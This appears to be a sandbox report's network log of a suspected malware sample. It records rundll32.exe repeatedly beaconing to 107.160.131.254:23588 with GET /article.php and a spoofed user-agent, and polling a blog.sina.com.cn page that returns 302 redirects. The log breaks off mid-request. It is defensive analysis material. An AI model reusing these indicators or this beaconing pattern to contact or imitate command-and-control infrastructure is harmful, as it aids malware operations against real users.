Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:34:11 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 50074 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:34:10.224524975 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 50121 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:34:14.206903934 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 50123 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:34:14.320843935 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 50124 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:34:14.329119921 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Dec 19, 2024 15:34:16.124452114 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:34:15 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 50166 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:34:18.218353033 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 50168 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:34:18.348444939 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 50169 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:34:18.348536015 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Dec 19, 2024 15:34:20.060470104 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:34:19 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 50208 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:34:22.340991974 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 50210 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:34:22.453018904 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.5 | 50211 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:34:22.470470905 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.5 | 50256 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:34:26.361413002 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 50260 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:34:26.470549107 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 50261 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:34:26.470716953 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Dec 19, 2024 15:34:28.300256968 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:34:28 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.5 | 50308 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:34:30.385987997 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.5 | 50311 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:34:30.507567883 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.5 | 50312 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:34:30.517781973 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Dec 19, 2024 15:34:30.875124931 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Dec 19, 2024 15:34:32.273067951 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:34:32 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          40 | 192.168.2.5 | 50371 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:34:34.511729002 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          41 | 192.168.2.5 | 50373 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:34:34.648057938 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:34:37.014148951 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:34:36 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          42 | 192.168.2.5 | 50374 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:34:34.649018049 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          43 | 192.168.2.5 | 50436 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:34:38.644294977 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          44 | 192.168.2.5 | 50442 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:34:38.750360012 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:34:40.492660999 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:34:40 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          45 | 192.168.2.5 | 50443 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:34:38.750665903 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          46 | 192.168.2.5 | 50510 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:34:42.637887955 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          47 | 192.168.2.5 | 50514 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:34:42.751437902 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:34:44.460810900 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:34:44 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          48 | 192.168.2.5 | 50515 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:34:42.751759052 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          49 | 192.168.2.5 | 50597 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:34:46.948242903 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          50 | 192.168.2.5 | 50599 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:34:46.948417902 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:34:50.609566927 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:34:50 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          51 | 192.168.2.5 | 50600 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:34:46.948545933 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          52 | 192.168.2.5 | 50690 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:34:50.678437948 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          53 | 192.168.2.5 | 50692 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:34:50.783268929 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          54 | 192.168.2.5 | 50694 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:34:50.801126957 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          55 | 192.168.2.5 | 50815 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:34:54.687002897 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          56 | 192.168.2.5 | 50820 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:34:54.800615072 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          57 | 192.168.2.5 | 50821 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 19, 2024 15:34:54.800981998 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.5 | 50962 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:34:58.704050064 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.5 | 50967 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:34:58.814078093 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.5 | 50968 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:34:58.815144062 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Dec 19, 2024 15:35:00.530720949 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:35:00 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.5 | 51148 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:35:02.731898069 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.5 | 51158 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:35:02.858628035 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.5 | 51159 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:35:02.858999014 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Dec 19, 2024 15:35:04.602087975 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:35:04 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.5 | 51331 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:35:06.982213974 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.5 | 51337 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:35:07.116161108 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.5 | 51338 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:35:07.122026920 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Dec 19, 2024 15:35:08.941135883 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:35:08 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.5 | 51553 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:35:11.125632048 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.5 | 51561 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:35:11.248106956 CET | 187 | OUT | GET /article.php HTTP/1.1
